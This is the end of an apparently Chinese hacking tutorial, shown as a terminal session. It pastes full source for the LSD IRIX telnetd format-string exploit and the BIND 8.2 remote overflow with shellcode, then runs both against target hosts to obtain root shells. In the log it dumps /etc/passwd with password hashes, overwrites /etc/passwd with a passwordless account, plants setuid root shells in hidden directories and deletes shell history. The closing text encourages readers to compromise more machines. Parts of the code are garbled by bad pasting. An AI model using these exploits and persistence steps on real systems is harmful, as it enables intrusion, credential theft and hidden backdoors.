{ 0, 0x56, 0x0fb50490, 122, 0x7fc4d220, 0x14 },
{ 0, 0x56, 0x0fb4fce0, 104, 0x7fc4d230, 0x14 },
{ 0, 0x56, 0x0fb4f690, 104, 0x7fc4d230, 0x14 },
{ 0, 0x56, 0x0fb52900, 104, 0x7fc4d230, 0x14 },
{ 1, 0x5e, 0x0fb576d8, 88, 0x7fc4cf70, 0x1c },
{ 1, 0x5e, 0x0fb4d6dc, 102, 0x7fc4cf70, 0x1c },
{ 1, 0x5e, 0x7fc496e8, 77, 0x7fc4cf98, 0x1c },
{ 1, 0x5e, 0x7fc496e0, 77, 0x7fc4cf98, 0x1c }
};
char env_value[1024];
int prepare_env(int vers){
int i,adr,pch,adrh,adrl;
char *b;
pch=tab2[vers].got+(tab2[vers].g_ofs*4);
adr=tab2[vers].subbuffer+tab2[vers].s_ofs;
adrh=(adr>>16)-tab2[vers].len;
adrl=0x10000-(adrh&0xffff)+(adr&0xffff)-tab2[vers].len;
b=env_ if(!tab2[vers].flg){
for(i=0;i<1;i++) *b++=' ';
for(i=0;i<4;i++) *b++=(char)((pch>>((3-i%4)*8))&0xff);
for(i=0;i<4;i++) *b++=(char)((pch+2>>((3-i%4)*8))&0xff);
for(i=0;i<3;i++) *b++=' ';
for(i=0;i
*b++=shellcode[i];
if((*(b-1)==(char)0x02)||(*(b-1)==(char)0xff)) *b++=shellcode[i];
}
sprintf(b,"%%%05dc%%22$hn%%%05dc%%23$hn",adrh,adrl);
}else{
for(i=0;i<5;i++) *b++=' ';
for(i=0;i<4;i++) *b++=(char)((pch>>((3-i%4)*8))&0xff);
for(i=0;i<4;i++) *b++=' ';
for(i=0;i<4;i++) *b++=(char)((pch+2>>((3-i%4)*8))&0xff);
for(i=0;i<3;i++) *b++=' ';
for(i=0;i
*b++=shellcode[i];
if((*(b-1)==(char)0x02)||(*(b-1)==(char)0xff)) *b++=shellcode[i];
}
sprintf(b,"%%%05dc%%11$hn%%%05dc%%12$hn",adrh,adrl);
}
b+=strlen(b);
return(b-env_value);
}
main(int argc,char **argv){
char buffer[8192];
int i,c,sck,il,ih,cnt,vers=65;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net//n");
printf("telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all/n/n");
if(argc<2){
printf("usage: %s address [-v 62|63|64|65]/n",argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"sc:p:v:"))!=-1){
switch(c){
case 'v': vers=atoi(optarg);
}
}
switch(vers){
case 62: il=0;ih=5; break;
case 63: il=6;ih=8; break;
case 64: il=9;ih=10; break;
case 65: il=11;ih=12; break;
default: exit(-1);
}
for(i=il;i<=ih;i++){
printf(".");fflush(stdout);
sck=socket(AF_INET,SOCK_STREAM,0);
adr.sin_family=AF_INET;
adr.sin_port=htons(23);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
perror("error");exit(-1);
}
cnt=prepare_env(i);
memcpy(buffer,"/xff/xfa/x24/x00/x01/x58/x58/x58/x58/x00",10);
sprintf(&buffer[10],"%s/xff/xf0",env_value);
write(sck,buffer,10+cnt+2);
sleep(1);
memcpy(buffer,"/xff/xfa/x24/x00/x01/x5f/x52/x4c/x44/x00%s/xff/xf0",10);
sprintf(&buffer[10],"%s/xff/xf0",env_value);
write(sck,buffer,10+cnt+2);
if(((cnt=read(sck,buffer,sizeof(buffer)))<2)||(buffer[0]!=(char)0xff)){
printf("warning: telnetd seems to be used with tcp wrapper/n");
}
write(sck,"/bin/uname -a/n",14);
if((cnt=read(sck,buffer,sizeof(buffer)))>0){
printf("/n%s/n/n",tab1[i].vers);
write(1,buffer,cnt);
break;
}
close(sck);
}
if(i>ih) {printf("/nerror: not vulnerable/n");exit(-1);}
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
^D
# gcc -o telnetd telnetd.c
telnetd.c:33: parse error before `IRIX'
telnetd.c:37: malformed floating constant
telnetd.c:37: nondigits in number and not hexadecimal
telnetd.c:37: malformed floating constant
telnetd.c:38: malformed floating constant
telnetd.c:77: nondigits in number and not hexadecimal
… (***因为粘贴文本出错,一大堆出错信息***)
# vi telnetd.c (***只好用vi来编辑程序***)
"telnetd.c" [New file]
#include
#include
#include
…
(***重新粘贴一遍***)
…
"telnetd.c" [New file] 188 lines, 6738 characters
# gcc -o telnetd telnetd.c
Undefined first referenced
symbol in file
socket /var/tmp/ccuoeAph.o
gethostbyname /var/tmp/ccuoeAph.o
inet_addr /var/tmp/ccuoeAph.o
connect /var/tmp/ccuoeAph.o
ld: fatal: Symbol referencing errors. No output written to telnetd
collect2: ld returned 1 exit status
# gcc -o telnetd telnetd.c -lsocket -lnsl
# ./telnetd
copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/
telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all
usage: ./telnetd address [-v 62|63|64|65]
# ./telnetd 192.168.0.10 -v 65
copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/
telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all
.
IRIX 6.5-6.5.8m 6.5-6.5.7f telnetd: no patches
IRIX O2 6.5 05190004 IP32 (***溢出成功啦***)
id
uid=0(root) gid=0(sys)
cat /etc/passwd
root:mmanI4kyarAEA:0:0:Super-User:/:/usr/bin/tcsh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
cmwlogin:*:0:994:CMW Login UserID:/usr/CMW:/sbin/csh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
daemon:*:1:1:daemons:/:/dev/null
bin:*:2:2:System Tools Owner:/bin:/dev/null
uucp:*:3:5:UUCP Owner:/usr/lib/uucp:/bin/csh
sys:*:4:0:System Activity Owner:/var/adm:/bin/sh
adm:*:5:3:Accounting Files Owner:/var/adm:/bin/sh
lp::9:9:Print Spooler Owner:/var/spool/lp:/bin/sh ***不少人进来过呢
nuucp::10:10:Remote UUCP User:/var/spool/uucppublic:/usr/lib/uucp/uucico *
auditor:*:11:0:Audit Activity Owner:/auditor:/bin/sh
dbadmin:*:12:0:Security Database Owner:/dbadmin:/bin/sh
sgiweb:*:13:60001:SGI Web Applications:/var/www/htdocs:/bin/csh
rfindd:*:66:1:Rfind Daemon and Fsdump:/var/rfindd:/bin/sh
EZsetup::992:998:System Setup:/var/sysadmdesktop/EZsetup:/bin/csh *
demos::993:997:Demonstration User:/usr/demos:/bin/csh *
OutOfBox::995:997:Out of Box Experience:/usr/people/OutOfBox:/bin/csh *
guest::998:998:Guest Account:/usr/people/guest:/bin/csh *
4Dgifts:*:999:998:4Dgifts Account:/usr/people/4Dgifts:/bin/csh
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:60001:60001:original nobody uid:/dev/null:/dev/null
informix:*:49999:777:Informix SA 3.0:/usr/sgi/informix:/bin/csh
posuser:gyo7hUq9BFNYE:55555:20:::
antoni:zUzbvPoZ6HC4g:23117:20:antoniWang:/usr/people/antoni:/bin/csh
#mkdir /usr/lib/... (***有这么多用户可以登陆,我们做个suid root shell就可以啦。***)
cp /bin/ksh /usr/lib/.../.x
chmod +s /usr/lib/.../.x
exit
#
-------------------------------------------------test--------------------------------------------------------------
在SunOS 5.7平台下攻击IRIX 6.5 系统成功完成。:)
我们来找几台Linux 玩玩。找Redhat吧,漏洞多一些,比如rpc.statd wuftp bind lpd等。:P
我们同样以这个SunOs 5.7做为我们攻击Linux的平台。Lsd写的exploit通用性真不错。
这次我们用bind远程溢出来攻击redhat 6.2
不过因为前段时间的worm,bind的成功率已经很小啦。
大家可以试试其它的远程溢出~~
-------------------------------------------------test--------------------------------------------------------------
#cat > bind.c (***源程序在http://lsd-pl.net/files/get?LINUX/linx86_bind ***)
#include
#include
#include
#include
#include
#include
#include
char msg[]={
0xab,0xcd,0x09,0x80,0x00,0x00,0x00,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x01,0x20,0x20,0x20,0x20,0x02,0x61
};
char asmcode[]=
"/x3f" /* label len 63 */
"/x90/x90/x90" /* padding */
"/xeb/x3b" /* jmp */
"/x31/xdb" /* xorl %ebx,%ebx */
"/x5f" /* popl %edi */
"/x83/xef/x7c" /* sub $0x7c,%edi */
"/x8d/x77/x10" /* leal 0x10(%edi),%esi */
"/x89/x77/x04" /* movl %esi,0x4(%edi) */
"/x8d/x4f/x20" /* leal 0x20(%edi),%ecx */
"/x89/x4f/x08" /* movl %ecx,0x8(%edi) */
"/xb3/x10" /* movb $0x10,%bl */
"/x89/x19" /* movl %ebx,(%ecx) */
"/x31/xc9" /* xorl %ecx,%ecx */
"/xb1/xff" /* movb $0xff,%cl */
"/x89/x0f" /* movl %ecx,(%edi) */
"/x51" /* pushl %ecx */
"/x31/xc0" /* xorl %eax,%eax */
"/xb0/x66" /* movb $0x66,%al */
"/xb3/x07" /* movb $0x7,%bl */
"/x89/xf9" /* movl %edi,%ecx */
"/xcd/x80" /* int $0x80 */
"/x59" /* popl %ecx */
"/x31/xdb" /* xorl %ebx,%ebx */
"/x39/xd8" /* cmpl %ebx,%eax */
"/x75/x0a" /* jne */
"/x66/xbb/x12/x34" /* movw $0x1234,%bx */
"/x66/x39/x5e/x02" /* cmpw %bx,0x2(%esi) */
"/x74/x08" /* je */
"/xe2/xe0" /* loop */
"/x3f" /* label len 63 */
"/xe8/xc0/xff/xff/xff" /* call */
"/x89/xcb" /* movl %ecx,%ebx */
"/x31/xc9" /* xorl %ecx,%ecx */
"/xb1/x03" /* movb $0x03,%cl */
"/x31/xc0" /* xorl %eax,%eax */
"/xb0/x3f" /* movb $0x3f,%al */
"/x49" /* decl %ecx */
"/xcd/x80" /* int $0x80 */
"/x41" /* incl %ecx "/xe2/xf6" /* loop */
"/xeb/x14" /* jmp */
"/x31/xc0" /* xorl %eax,%eax */
"/x5b" /* popl %ebx */
"/x8d/x4b/x14" /* leal 0x14(%ebx),%ecx */
"/x89/x19" /* movl %ebx,(%ecx) */
"/x89/x43/x18" /* movl %eax,0x18(%ebx) */
"/x88/x43/x07" /* movb %al,0x7(%ebx) */
"/x31/xd2" /* xorl %edx,%edx */
"/xb0/x0b" /* movb $0xb,%al */
"/xcd/x80" /* int $0x80 */
"/xe8/xe7/xff/xff/xff" /* call */
"/bin/sh"
"/x90/x90/x90/x90" /* padding */
"/x90/x90/x90/x90"
;
int rev(int a){
int i=1;
if((*(char*)&i)) return(a);
return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24);
}
int main(int argc,char **argv){
char buffer[1024],*b;
int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net//n");
printf("bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86/n/n");
if(argc<2){
printf("usage: %s address [-s][-e]/n",argv[0]);
printf(" -s send infoleak packet/n");
printf(" -e send exploit packet/n");
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"se"))!=-1){
switch(c){
case 's': flag=1;break;
case 'e': flag=2;
}
}
if(flag==-1) exit(-1);
adr.sin_family=AF_INET;
adr.sin_port=htons(53);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
if((hp=gethostbyname(argv[1]))==NULL) {
errno=EADDRNOTAVAIL;goto err;
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck[0]=socket(AF_INET,SOCK_DGRAM,0);
sck[1]=socket(AF_INET,SOCK_STREAM,0);
if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
i=sizeof(struct sockaddr_in);
if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
struct netbuf nb;
ioctl(sck[1],(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck[1],(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
asmcode[4+48+2]=(unsigned char)((n>>8)&0xff);
asmcode[4+48+3]=(unsigned char)(n&0xff);
if(write(sck[0],msg,sizeof(msg))==-1) goto err;
if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err;
printf("stack dump:/n");
for(i=0;i<(cnt-512);i++){
printf("%s%02x ",(i&&(!(i%16)))?"/n":"",(unsigned char)buffer[512+i]);
}
printf("/n/n");
fp=rev(*(unsigned int*)&buffer[532]);
ofs=(0xfe)-((fp-(fp&0xffffff00))&0xff);
cnt=163;
if((buffer[512+20+2]!=(char)0xff)&&(buffer[512+20+3]!=(char)0xbf)){
printf("system does not seem to be a vulnerable linux/n");exit(1);
}
if(flag==1){
printf("system seems to be running bind 8.2.x on a linux/n");exit(-1);
}
if(cnt<(ofs+28)){
printf("frame ptr is too low to be successfully exploited/n");exit(-1);
}
jmp=rev(fp-586);
ptr6=rev((fp&0xffffff00)-12);
fp=rev(fp&0xffffff00);
printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs);
printf("port=%04x connected! ",(unsigned short)n);fflush(stdout);
b=buffer;
memcpy(b,"/xab/xcd/x01/x00/x00/x02/x00/x00/x00/x00/x00/x01",12);b+=12;
for(i=0;i
for(i=0;i<(128>>1);i++,b++) *b++=0x01;
memcpy(b,"/x00/x00/x01/x00/x01",5);b+=5;
for(i=0;i<((ofs+64)>>1);i++,b++) *b++=0x01;
*b++=28;
memcpy(b,"/x06/x00/x00/x00",4);b+=4;
memcpy(b,&fp,4);b+=4;
memcpy(b,"/x06/x00/x00/x00",4);b+=4;
memcpy(b,&jmp,4);b+=4;
memcpy(b,&jmp,4);b+=4;
memcpy(b,&fp,4);b+=4;
memcpy(b,&ptr6,4);b+=4;
cnt-=ofs+28;
for(i=0;i<(cnt>>1);i++,b++) *b++=0x01;
memcpy(b,"/x00/x00/x01/x00/x01/x00/x00/xfa/xff",9);b+=9;
if(write(sck[0],buffer,b-buffer)==-1) goto err;
sleep(1);printf("sent!/n");
write(sck[1],"/bin/uname -a/n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck[1],&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck[1],buf,cnt);
}
if(FD_ISSET(sck[1],&fds)){
if((cnt=read(sck[1],buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
exit(0);
err:
perror("error");exit(-1);
}
^D
# gcc -o bind bind.c -lnsl -lsocket
# ./bind
copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/
bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86
usage: ./bind address [-s][-e]
-s send infoleak packet
-e send exploit packet
#./bind 192.168.0.20 -e
copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/
bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86
stack dump:
42 24 08 08 02 00 b1 ed ca 42 c8 06 95 d0 15 c0
00 cb fa c0 a8 fc ff bf d6 58 08 08 90 3f 0d 08
f4 a4 10 40 16 00 00 00 01 00 00 00 90 3f 0d 08
05 00 00 00 e0 e7 0b 08 16 00 00 00 01 00 00 00
a0 e0 05 08 f4 a4 10 40 c4 fc ff bf 60 e9 0c 08
00 00 00 00 c8 fd ff bf c8 fd ff bf 61 d6 05 08
90 3f 0d 08 bc 76 10 40 b4 11 10 40 14 fe ff bf
01 00 00 00 bc 76 10 40
frame ptr=0xbffffc00 adr=bffffa5e ofs=86 port=e1fa connected! sent!
Linux localhost.localdomain 2.2.14-5.0 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
Id
uid=0(root) gid=0(root)
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
gdm:x:42:42::/home/gdm:/bin/bash
william:x:500:500:William Wang:/home/william:/bin/bash
www:x:688:501:web user:/home/www:/bin/bash
xeye:x:689:501:Xeye web user:/home/xeye:/bin/bash
td_ftp:x:655:50:TD Bank FTP Client:/home/td_bank:/bin/bash
cyberplex:x:690:100:Cyber:/home/cyberplex:/bin/bash
echo “test::1:0::/:/bin/bash” > /etc/passwd
telnet localhost
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: test
bash$ id
uid=1(bin) gid=0(root) groups=0(root)
bash$ exit
logout
Connection closed by foreign host.
mkdir /usr/lib/…
cp /bin/sh /usr/lib/…/.x
chmod +s /usr/lib/…/.x
exit
#rm –rf /tmp/*.c
#mv bind /usr/lib/…
#mv test /usr/lib/…
#mv lpset /usr/lib/…
#mv snmp /usr/lib/…
#cd
#rm –rf .sh_history /.sh_history
#chmod 777 /usr/lib/…
#exit
$exit
-------------------------------------------------test--------------------------------------------------------------
省略了很多,如后门安装和脚印的擦除等。
其实入侵一个系统后更要注意保持自己在系统上的权限,所以清除日志以免被发现,和安放后门以便再次进入这个系统
都是很重要的。
因为以前写过这方面的教程,就不再写了。
大家慢慢提高自己的技术吧。
有时间就去扩散战果,比如Redhat 7.0和该死的freebsd。
自己想办法哦。
肉鸡找回来几台,最后一篇入侵教程总算也写完了,再见啦~
以后也许会写一些技术分析的文章。
大家好运…